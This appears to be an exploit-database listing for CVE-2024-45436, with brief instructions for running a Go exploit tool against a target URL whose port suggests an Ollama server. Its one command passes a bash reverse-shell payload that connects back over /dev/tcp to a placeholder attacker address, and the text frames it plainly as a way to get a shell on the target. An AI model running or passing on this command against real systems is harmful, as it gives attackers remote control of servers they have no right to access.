Share
## https://sploitus.com/exploit?id=36FE44E7-1B12-5382-A90B-BEBD403D2657
# CVE-2024-45436
CVE-2024-45436
Need to run under Linux, the environment needs to have gcc
Install golang, execute the following command to rebound the shell

```bash
go run main.go -target http://127.0.0.1:11434/ -exec "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx 0>&1"
```

Note: Exploitation may take several minutes, please be patient